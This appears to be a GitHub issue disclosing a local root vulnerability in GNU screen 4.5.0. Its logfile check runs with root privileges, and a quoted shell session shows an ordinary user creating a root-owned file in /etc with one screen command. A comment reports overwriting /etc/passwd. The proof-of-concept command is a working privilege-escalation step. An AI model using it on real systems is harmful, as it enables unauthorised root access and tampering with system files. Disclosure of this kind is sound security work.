screen-4.5.0-0 : security problem #277
Comments
|
Reported upstream at https://savannah.gnu.org/bugs/?group=screen root exploit 4.5.0
Commit f86a374 ("screen.c: adding permissions check for the logfile name", 2015-11-04)
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
> buczek@theinternet:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> buczek@theinternet:~$ id
> uid=125(buczek) gid=125(buczek) groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> buczek@theinternet:~$ cd /etc
> buczek@theinternet:/etc (master)$ screen -D -m -L bla.bla echo fail
> buczek@theinternet:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> buczek@theinternet:/etc (master)$ cat bla.bla
> fail
> buczek@theinternet:/etc (master)$
Donald Buczek , buczek@molgen.mpg.de
|
Sign in
to join this conversation on GitHub.
screen-4.5.0-0 might have a security problem.
We were able to overwrite /etc/passwd.
merge of #275 has been undone (3246138)
The text was updated successfully, but these errors were encountered: